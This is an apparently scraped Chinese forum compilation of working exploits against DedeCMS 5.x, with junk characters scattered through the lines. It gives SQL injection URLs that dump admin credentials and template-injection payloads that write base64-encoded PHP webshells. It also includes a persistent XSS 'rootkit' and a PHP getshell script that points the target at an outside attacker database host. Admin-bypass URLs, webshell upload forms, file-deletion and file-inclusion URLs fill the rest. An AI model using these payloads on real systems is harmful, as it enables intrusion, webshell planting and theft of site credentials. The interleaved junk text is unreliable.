|
|
( _# H/ ?8 J9 N6 XDedecms 5.6 rss注入漏洞
0 t; O# k. g# I2 ?! l9 Qhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1; }3 l& m4 q& G7 H/ c% F1 [
- f3 C4 k* K4 Z; @6 r
4 A( i5 u \# |$ ^- f( S4 M+ |, ]6 u2 C1 c, I* `
0 s! s5 m, D) t2 z0 U5 m% P/ Q
& k! |) f5 K6 w! _; ]7 P) N2 z0 R* \' T' N7 t( E( g3 L" p" U" O
7 H# `& N1 a8 `# R: _7 J
* J2 r% m, w5 Q4 qDedeCms v5.6 嵌入恶意代码执行漏洞
% Y5 i8 S( A- L4 K' E$ d) w7 B# p# N注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}; l% }2 W8 f( o6 p4 {5 w
发表后查看或修改即可执行, D) A# b+ M- o' D3 T* L
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}0 g0 H* V# R7 } p
生成x.php 密码xiao,直接生成一句话。& q7 P( z, F3 Y/ u/ e. L& h$ E
' Z: a( B9 p, p4 W, x3 U# Q
+ y s/ x7 z! {! k, f1 Q* Q: @
# P! e6 a/ j: J! G* G( h6 ~9 y! ]* k$ O7 Z5 }- W* X
5 I) X; u/ U" z) |$ P4 O
+ J5 G# l8 \1 y8 o9 a6 R$ a4 R4 E1 `
+ G, f$ k8 s% b/ h# b" MDede 5.6 GBK SQL注入漏洞
- |% `- l1 d* S, O# J6 \http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
4 h3 c) j7 M; T0 B1 Qhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe, |( u8 m8 E& d& N# c0 o
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A75 e; O) n: u5 ]0 t8 `+ Y7 e
; `8 l6 b$ z( e6 U5 |& [! ?3 x' }' D( d5 a
. G# u/ K/ L" [- I5 s- `: `. R) r
$ D* {) V3 _& G$ i, H" Z7 q n' |, ?! U0 `/ {) a( \
4 Z, V; M5 m9 a |5 D# d1 O5 Q9 w. P/ P" D" y9 Y z
$ A B6 N3 ~2 ?$ B6 |
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
1 Z4 N) s2 A8 ~ B4 ghttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` & b& ~5 j8 A9 k
6 ~+ t; G( G; R6 p# G: \
H/ t& v. [, ?2 I3 ~% @5 X' I* a/ e# G
; @) K& h# X. F' k# @2 W# K# [; e
" q9 R9 Q# O7 F U3 p9 a. n7 f E" A5 ]" m$ U+ v# |( l1 ^+ i
DEDECMS 全版本 gotopage变量XSS漏洞3 O4 A1 r- N3 s$ A
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 + x; f& T: ^! T1 b
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
r1 W) O% A8 E& e" T& `
( U+ u8 ^( [! O& o2 V! q) z! i5 X- T$ _2 c0 a' N
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
3 U5 F3 F* r# Q. F- Dhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
: p2 {- v( G: Z
( a+ @- @% u E& \: j5 ~
9 q, C/ I, Z5 l yhttp://v57.demo.dedecms.com/dede/login.php
8 s& _* w/ W2 _! P
2 e3 U# A% f# k- D8 ?% ]3 R( S/ L! n
color=Red]DeDeCMS(织梦)变量覆盖getshell
; z# ?& m( V9 e$ [#!usr/bin/php -w
; H- S2 F9 E5 M+ w( h0 s<?php& m i! U& t, x& J1 q
error_reporting(E_ERROR);" T$ O& }4 P4 o4 n$ T! a
set_time_limit(0);: E+ Z1 j* I/ b
print_r('
5 E$ @! T# O6 w3 P3 t1 w- CDEDEcms Variable Coverage
" S Q6 |) E7 R. MExploit Author: www.heixiaozi.comwww.webvul.com
4 n& b8 ?0 u9 |$ { R);0 I* J- P" x4 X! K& p7 U# v
echo "\r\n";; }; g; U( c" S3 H, @9 C
if($argv[2]==null){
" R: n8 O' L) ]4 lprint_r('* q: B% W5 r: N+ ^6 U5 d' ?( X, ?
+---------------------------------------------------------------------------+9 j# X9 ]- H V4 t7 t
Usage: php '.$argv[0].' url aid path
% C# V# N( u! Raid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/! B: w/ H/ N# Y7 O6 c2 S6 W& l) v
Example:% A6 I! a$ l: q4 f( D! K/ i! K9 p) E
php '.$argv[0].' www.site.com 1 old
5 U! m b/ `$ w1 j+---------------------------------------------------------------------------+# A0 U1 M2 z4 q {
');
( S$ B4 T: b# ~. F) s- Aexit;
& W- q3 s( M* I e( q3 k}
9 x3 I& ]6 J$ y6 D& e0 u: _$url=$argv[1];
/ y( D: @( P( C: R/ j% b h$aid=$argv[2];3 c& k- _. m# r w7 O
$path=$argv[3];
# R# m5 o2 R' |$exp=Getshell($url,$aid,$path);2 L+ p% O: V* O! C
if (strpos($exp,"OK")>12){
3 `+ r$ j2 l" P7 i @echo "
- ~' r" O) x8 K5 N/ D7 w- {Exploit Success \n";2 d* \. h! o, v( U
if($aid==1)echo "
+ G: H! U, N+ oShell:".$url."/$path/data/cache/fuck.php\n" ;, n4 A* q' S2 C- x* |
1 i& m& ~/ [2 S) T- G0 I
5 N3 s5 y6 i7 K* Xif($aid==2)echo "4 j0 o, ]6 t- `4 F
Shell:".$url."/$path/fuck.php\n" ;
* i! |& h% ~8 a( s( O7 j$ I. y& W$ G* w4 L
* N3 @5 j' c, C2 g2 [
if($aid==3)echo "/ l$ D. ]5 Y2 f1 F
Shell:".$url."/$path/plus/fuck.php\n";
: P* \/ I) K; k+ }! d
8 {) I7 ^' ?; A/ q$ e" D5 X5 i* f l
}else{
7 n+ U- e; S5 f! `; k& F9 l0 yecho "( j1 ?( J# s: s" k1 b
Exploit Failed \n";# G. ]& r8 m7 h m# L
}6 g! Q% n1 {9 u# A, S2 X
function Getshell($url,$aid,$path){, Q: `5 a! Y# G0 N' A5 s
$id=$aid;, a' l% h9 `" t
$host=$url;
% T _5 P5 x1 v( f: g$port="80";) _/ F3 T3 y$ \+ C% o
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
5 E) e8 ]6 H, e3 _* r$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
9 y, F, a- p9 Z! S" F; Z9 I% H$data .= "Host: ".$host."\r\n";
% h) @$ V+ d: M& U/ D8 b; N- G) w$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
% X4 }! u* t% r! U$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
0 P' u/ E9 @# p; o8 x$ q. f$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
6 m- T" Y3 R3 o E//$data .= "Accept-Encoding: gzip,deflate\r\n";
+ {% ~; e1 ^) `3 ] L( R( o( N- X$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";; S0 N1 h1 R% w" ?0 y X, V
$data .= "Connection: keep-alive\r\n";
& O c$ J4 |8 [ ~ Q& v$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
& F0 H0 p' c8 h3 Q. \3 l$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
! }; \5 R0 {& W: |8 ?: G7 }$data .= $content."\r\n";- f" k ~( v! m5 c6 p) w
$ock=fsockopen($host,$port);. d4 Q( C# r! T: B& H+ F+ u
if (!$ock) {: Q( |' a' ]: Q7 _; ~
echo "
# E) K4 f% V4 R: fNo response from ".$host."\n";& c7 z& R# U2 c
}5 I! n: R7 h' ^6 Y% E
fwrite($ock,$data);* _ B' L- e9 A/ e+ ]
while (!feof($ock)) {5 i; Z. W( ~4 c# T2 n: x
$exp=fgets($ock, 1024);
& [; C6 i. Q# ]6 Q/ |8 I3 nreturn $exp;# o$ B9 d8 h y
}2 |" ^5 `9 m- b
}
! \6 C. w) x* ~' t {
0 ]# [0 b c T: y" K {0 ?, \- e4 h4 S: ]
?>
$ b( P; p( Z2 d; j9 l: N# d; m# j2 i( A8 f
" l6 m/ ~: G+ Q$ z4 f
( D- V* B2 S* T( [
. S6 N( T9 P4 S! D& A( I
6 L: a- A1 P0 f! E3 S/ p {3 y7 G2 m- d
$ y% y& l: P- I( {' n& k6 Q6 _, x2 b2 K
0 z9 k8 q0 _( G3 I! f
) W0 ~& i; ?# r; R' \. f) g& h+ t1 l
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台): ^3 k( S: k2 @; Y2 c! ^; b& Z
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root" A X" I4 K% S, f+ L( `
; ~$ k) W# F: w6 j! a/ W3 X! x; Z# k. _; N5 k) i$ f+ r0 a
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
2 ~5 k# s/ W, x3 C1 V
6 c; G8 n+ K2 b) G2 K$ b1 @9 n
# o* f8 i+ T. Z1 D4 g此漏洞的前提是必须得到后台路径才能实现
' h: o3 e6 m; G% h( {6 Q
0 b2 U" k+ Z+ T$ }$ Z6 k
" }' P% K: g- w8 p' m/ k# m/ W- |, H8 ~# m3 [% u% E
" R4 @% f1 C' E0 Z, o8 M" [- q/ `8 l8 Z
$ M2 C, g" W7 B/ N- E8 R
% P( N2 L. |( }. f
1 \7 p6 z3 [8 D3 e# K- R% X, [) s, f- T1 r) F6 F; R
$ l3 i* n# `0 O" U* M3 ]
Dedecms织梦 标签远程文件写入漏洞1 n) z2 u, V( R ]
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');/ n( a- g6 C, N: X0 p* r8 g" R- A
# ]9 q8 B) B( `* {0 H5 k- g
+ @0 t& U/ J8 l; Y
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
; }' \2 M" y; m- } k<form action="" method="post" name="QuickSearch" id="QuickSearch">" F9 @( A+ C I4 ~ i
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
, ]$ ^4 t) y1 u8 {' |7 l% s% q<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />1 e& V$ U2 l4 f" |# n4 W
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />. ]: A# m8 K7 c; }) r/ {4 D9 S
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
3 Z% S2 T) e2 y5 n/ W ?9 T9 ~3 U<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
2 H( ^8 W6 ]$ s<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />. p0 l! j6 i) ^/ X
<input type="text" value="true" name="nocache" style="width:400">
; X. A, V) t& B) x<input type="submit" value="提交" name="QuickSearchBtn"><br />
3 L8 z5 @9 y, Y B. A3 [ |/ U</form>
9 Q9 i: @/ t) G<script>4 a# u: |( d6 c, l6 ^5 u
function addaction()7 m6 A8 c& a6 i& T3 E9 D- w
{6 f/ ^' x+ U* N
document.QuickSearch.action=document.QuickSearch.doaction.value;
1 s# V: `/ `1 r+ d}
/ X( [) j1 ]3 ~; d/ b6 s9 `% x; g</script>
2 n( q8 _( z! g; q3 A/ d; {+ I
. P/ ?3 G; U4 ?
1 D' l" y( v8 u! m( z
& O7 r" u: g% h$ Y# U% U$ n
8 i! \3 Q1 X7 ?# K1 S( n0 k, V7 ?' B+ q3 |' u8 M+ p
: t3 P3 Z$ Z) D [+ e/ c) X# m7 A; }* x+ s- j6 \$ r
& l) K, C! N+ D5 t: y6 P
p5 Z& ^, ?# E& p
2 h7 ` C2 v Y9 L; o/ }
DedeCms v5.6 嵌入恶意代码执行漏洞% Y' r/ @, ] b% ^
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行* Q- u$ r4 r% y. a
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}# e0 O+ g; v" U$ W& ?
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
7 s0 {, n& x' `3 Z: n. k# D/ zDedecms <= V5.6 Final模板执行漏洞; f6 w. {! `, D- @* j' |$ ^7 G
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:+ o$ b/ N* k" q9 O' f: c) C+ r/ Q
uploads/userup/2/12OMX04-15A.jpg4 E2 ^4 j8 e/ y+ O
* U1 A) P, m/ v4 w9 h: W2 ]
: r& f \4 }" z, K& w模板内容是(如果限制图片格式,加gif89a):+ i, d+ `1 z! ^" M; E! t# d$ H
{dede:name runphp='yes'}$ T- Y0 k( I% K2 M7 l- v: V
$fp = @fopen("1.php", 'a');
' ?; f* c/ u; ]/ U. O; h( _ [@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");. x2 j5 r' @; L
@fclose($fp);, d6 l% n5 J) M9 i, R6 H
{/dede:name}
0 T! d# ~$ S. O( L2 修改刚刚发表的文章,查看源文件,构造一个表单:( g7 V! F+ M9 b! ?/ X
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
' D* j: G( G% K7 V7 C8 R<input type="hidden" name="dopost" value="save" />1 f; J! b& Z- L* ^0 D* d4 i
<input type="hidden" name="aid" value="2" />
; ^( _' ^( f2 `! p8 L3 V6 Q) ^1 ?<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />7 b/ X4 T$ s2 ~8 h6 T( |, N2 F
<input type="hidden" name="channelid" value="1" />
7 ^4 y! m3 @1 a$ L+ B1 O5 J<input type="hidden" name="oldlitpic" value="" />
) M, a2 S1 C) d) c$ H<input type="hidden" name="sortrank" value="1275972263" />
0 f- [$ X% l& a8 [
" o! O" O7 x6 S! d) R/ b/ W# J4 @ Q* q: ~9 A" h
<div id="mainCp">
% M' q2 n6 h( [<h3 class="meTitle"><strong>修改文章</strong></h3>9 y) X0 R8 }1 V# z2 o
7 h: q) `$ y( u& D3 d( m
& x+ ~3 {. ~( t+ y+ S1 q( g) T<div class="postForm">( Q6 j. `+ F8 t
<label>标题:</label>
+ t6 w! J, u- W5 T5 H0 L/ q3 M<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>8 z* g" ]$ v, h- y
; o" X2 l* [! k" f. M7 S4 \! W7 \
<label>标签TAG:</label>
- H% h! V+ C% A/ C<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
e, _, a& f5 ]) l
- v8 E+ L- T, H% f2 E6 X3 ] }! H( g0 C: r. J. N9 h7 k' h* f
<label>作者:</label> B( b: _( s$ [( a
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>! P& \( @- V# b7 F) W
- n' w- B9 s$ x0 U7 C' V: l
: W* y; i) c- A<label>隶属栏目:</label>
- P0 V8 H1 R8 Z: U9 m<select name='typeid' size='1'>
0 p, X8 T5 I) I+ N<option value='1' class='option3' selected=''>测试栏目</option>
$ R3 }9 d9 ?' C0 y% J: l1 y</select> <span style="color:#F00">*</span>(不能选择带颜色的分类). n. v) ^; E( V/ |, k: h/ r
8 D' j L3 v$ X# U: D o- t8 I4 Y% G3 e w9 W9 K3 t7 C
<label>我的分类:</label>
, x! r- D, V' R; S, a<select name='mtypesid' size='1'>
8 {. D0 D3 I" J3 _4 |; ^ h<option value='0' selected>请选择分类...</option>1 U8 `( U2 n1 o9 } A) C
<option value='1' class='option3' selected>hahahha</option>
[* I* Y# i2 w' A$ a8 y</select>* U E- U9 [' X/ U3 h
1 ~. E9 s9 {- }% t0 l
: E" x" ?5 ]0 b& s0 s<label>信息摘要:</label>2 e/ \1 b# G/ I6 ~
<textarea name="description" id="description">1111111</textarea>
2 ?6 t4 P, j" i' V(内容的简要说明)
( m0 T3 [$ p5 }/ q7 @, h1 D
7 f6 y. t* N* h) c1 k! w& ~% @8 Q; R/ p0 @# ?
<label>缩略图:</label>
* k1 }& c8 z% A1 O( r$ g<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>2 L1 t- [. f- x; Y. j7 W
) O1 u) C, g, x
% M! C! R% r4 i4 u- m<input type='text' name='templet'% q7 n) d- v1 C; M! b! R
value="../ uploads/userup/2/12OMX04-15A.jpg">9 g1 J$ _9 L g/ p5 }, r
<input type='text' name='dede_addonfields'! @1 l1 M$ r/ P- Y2 y7 x
value="templet,htmltext;">(这里构造)0 i+ r5 Q/ M7 U6 u
</div>
" L3 }, k. X A. `# j# g: L) ?; e1 z+ C- W2 Z
" s& f" k& \4 C) K" Z1 @0 ~9 P
<!-- 表单操作区域 -->" S/ C" x. t. b
<h3 class="meTitle">详细内容</h3>& m. x" @' H1 G3 e" Z" k( A% o
) b9 [- h/ D3 ?5 u( _& m/ M# U& v
- a( ?1 ]# c: {9 L7 X; P
<div class="contentShow postForm">! g! a( }& ~- i! \6 N, S
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
$ ^! J: M$ P3 w% I& L! Q0 H e( c) j% B# k0 e% _9 }' p# Q
3 b2 q8 k. o) }8 N2 O1 v" _<label>验证码:</label>0 J( p+ n3 [8 R* {
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
+ S# Y# [9 Y* k, _% J: V<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />0 n3 p+ B. G7 E9 H
2 b: d- r6 t" V. |* P! P' d: I" A! Y/ j
<button class="button2" type="submit">提交</button>
" A5 R: x3 A2 Y4 s2 y0 B# J) S% P. A<button class="button2 ml10" type="reset">重置</button>
/ C1 F* X8 Q6 t) j1 k% Q</div>
1 F+ {5 q) v- F& C% C; B( N1 O* B" ~
6 a1 M$ B7 n: h' @( `; y- n% v$ p8 j' `% \% K
</div>
1 [( s) R/ s8 B% K4 v/ f$ I+ n/ E \$ {0 g6 D( x! \* v
; O/ c1 L% [0 k% K W! V
</form>, d4 W/ j/ \% v" V: F
' y2 l7 X6 Q9 @) R$ y2 F: X
2 ~- X' L) `2 f提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
8 Z2 W. L f( p3 n! z; h- c, A假设刚刚修改的文章的aid为2,则我们只需要访问:
, }2 B. I3 L/ F% H2 B. A* Dhttp://127.0.0.1/dede/plus/view.php?aid=2: f) W& m# `, Z7 _. n
即可以在plus目录下生成webshell:1.php
+ T8 i3 C8 y u# b/ I# b. p
8 x, C% H# x g/ i3 C( K9 R& X
+ J4 w9 t! L. p8 ^5 `+ G5 W* j! S% i0 l
- G0 c h& ~8 I9 X0 G8 D7 E
7 t" W7 f) \5 y; y0 X
l# N/ j+ E T; ~' [. u# F% l/ d8 U
; o5 D# K7 I& v+ v0 E; n0 E& Q
; F/ k0 y7 A) g h" F7 O
5 D) h# S E7 l8 @; X1 C0 x6 }, Q% }. C4 p( j
5 \0 }& A! j; H0 b
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
. @# W7 h# S K% W0 k1 QGif89a{dede:field name='toby57' runphp='yes'}! A: e1 Y9 R2 j3 Z* o
phpinfo();
% i" u8 d3 V- x) }{/dede:field}
2 `3 S/ b' ^/ r保存为1.gif" O1 N: {+ ?( r$ {4 X* h7 I! G. A
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> - [ z/ c/ c+ Z$ F7 M
<input type="hidden" name="aid" value="7" /> - R0 E P, J) V8 W& i# ~
<input type="hidden" name="mediatype" value="1" />
* P s3 G7 E( M" _" m R6 T<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
, |: j4 L4 _& r8 s8 P- W" l<input type="hidden" name="dopost" value="save" /> + c0 \4 I* w$ }& |+ b! x
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
# z) a5 K: ~, ^: r<input name="addonfile" type="file" id="addonfile"/>
9 L0 N- s/ S. F9 w6 j: W' H<button class="button2" type="submit" >更改</button> : g% F6 f$ D8 M L
</form> : ]! V5 S7 [9 X2 u
% ~1 [! L' p F, Z2 ?8 M3 }: V6 w7 c3 L0 y2 |9 N* P, n
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
$ N6 d3 b2 }6 k+ t$ Q发表文章,然后构造修改表单如下:
+ {, t" e( v7 a9 [
, T% F. L8 t/ K5 N# Z
1 t, u! A) N2 V<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
4 I2 p0 E `# m w9 T% X<input type="hidden" name="dopost" value="save" /> ! j7 R- a* u/ [, Z
<input type="hidden" name="aid" value="2" />
$ ~8 x) I3 C( F" ~+ q<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
0 M- {/ o3 ^2 M, |<input type="hidden" name="channelid" value="1" /> ( x% s/ P, n. s6 K/ k0 H
<input type="hidden" name="oldlitpic" value="" /> " ^( |. l3 W# D6 L: p2 h
<input type="hidden" name="sortrank" value="1282049150" />
, y( V. ~5 W; N3 c9 s/ X$ S<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
3 M% |6 M/ h$ X8 T' \<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> " @' V9 @ h d; k9 E# F
<select name='typeid' size='1'> # e" I+ |; ]" Y: P% S% T8 K
<option value='1' class='option3' selected=''>Test</option>
* r4 B4 y$ c# C. P2 j# ^6 Z- \<select name='mtypesid' size='1'>
" ^ Q3 h1 ]$ [1 I Q; I6 Y2 ?<option value='0' selected>请选择分类...</option>
/ t. `- y4 b; X9 A( A<option value='1' class='option3' selected>aa</option></select>
+ [9 h/ }8 P0 E& Y8 h9 l: i<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> + f* |: R# V" ]+ o# U( k9 F
<input type='hidden' name='dede_addonfields' value="templet"> - U( k4 O% I* C
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
& _6 O( C! ]8 o l/ d; G2 k) ]' ^<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> - X4 ~7 b" C; Q. z1 H
<button class="button2" type="submit">提交</button>
. N% m& g. k1 M1 F6 w0 \! K, s2 P, c! C</form># U! d' @, d9 U1 o8 O
% E5 d' w; m9 B1 o% [# n' I+ O/ R& o3 c% g3 y2 q; ~( b
. B4 L, a- X, e t' k. ]
/ }3 H, k; K, i8 d1 V, [
# V/ T! L" K/ b `
" h+ {4 Q( }* H! }8 Z! M
- m$ a9 w* o9 A& ^7 g! }
) y9 q* L' X% y+ A- V0 p4 A1 m; ^1 Q
, n8 G% p7 q- G% _6 C1 S1 Z
2 b& |% c" o) R
. k' ~3 M: J* v7 n5 K1 U* r织梦(Dedecms)V5.6 远程文件删除漏洞/ o7 [2 t) Z/ K% C
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
" e" d9 e, ^( y' W# A% t0 M }" J( Q9 u7 d5 E
. s4 I! W/ K( S6 A
7 h# `9 I; b5 ?7 Y2 {0 b+ ]) K
: ^' c2 b0 q1 M
. w& y# N, y1 D$ ?: A) r# w0 v( Q. i/ F u
+ I1 w( e4 \2 G% {. Q0 E
* Z8 I3 ~- ]8 D0 X( o# \1 m6 T2 z! h
! i# K4 s2 f* V
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
5 ~$ o6 u) i2 k& S0 Xhttp://www.test.com/plus/carbuya ... urn&code=../../
# }0 X/ F" ~+ _1 I* M, \/ J
# w7 W* A$ b2 f+ O3 o7 `0 \
' ]' d, r: a- r U8 X8 _
* p" S6 S, ^- Y$ H: c8 D6 h
1 ]" k6 ?1 d) J7 w. w$ H' \2 V& x$ W( b/ g
5 l& T O& G& S. N B5 p
! | U% e' J# h! Y8 C8 S
& {1 x2 t. `$ x- {) O V9 h- S# y9 v H. H q9 u9 f! W) D/ M
# N* Q" ?5 P8 j' b& ~DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 + A o, R/ n, J7 y- c/ \6 c: M
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`0 f! n2 b: _6 Q& r8 t
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
/ s9 u7 g8 D. |1 j [) t5 W% J( `2 [6 p& R6 t
+ Z) r; }/ P) G E% `
8 Q: w/ ?1 f' B9 ~
7 d4 q8 B1 `$ C9 J+ u. R) @/ n- p* j8 f% ~* G8 x2 b& b
5 o" x; [: j( ^
# V, r, f9 n- _1 _% H6 k/ z6 K; O/ k( |: v7 D% n' V
, O8 V/ F2 p+ t5 O! P8 _, V
( M/ j9 B2 C$ p2 M6 r' m) X9 y2 ]* r
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
' l0 g3 d8 {0 W- X2 @# Uhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
1 x! \8 K. w& C# u. ~" x! d8 s) [+ o. f' @ D3 a
8 r1 ?4 B ~( V w1 T
8 y y- Q, D H+ Q3 P- f9 Z% d5 v* ^
' K8 v. g; @/ {: I) c" g
1 @' H: E* E2 _6 m
4 D& f/ j, n% x- U0 d
, N" p, B8 b- t; Q3 K: e1 w$ T- e0 v# H. n
+ m0 i. `+ `# n* e( r* A# `1 _1 R
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞$ c( k D) r+ _2 l
<html>
0 w8 X+ V. [0 B<head>
4 T+ p$ t/ F+ e @<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>1 T1 X0 T0 m8 f0 q
</head>
F, D; l, S* C8 h+ u+ ~<body style="FONT-SIZE: 9pt">
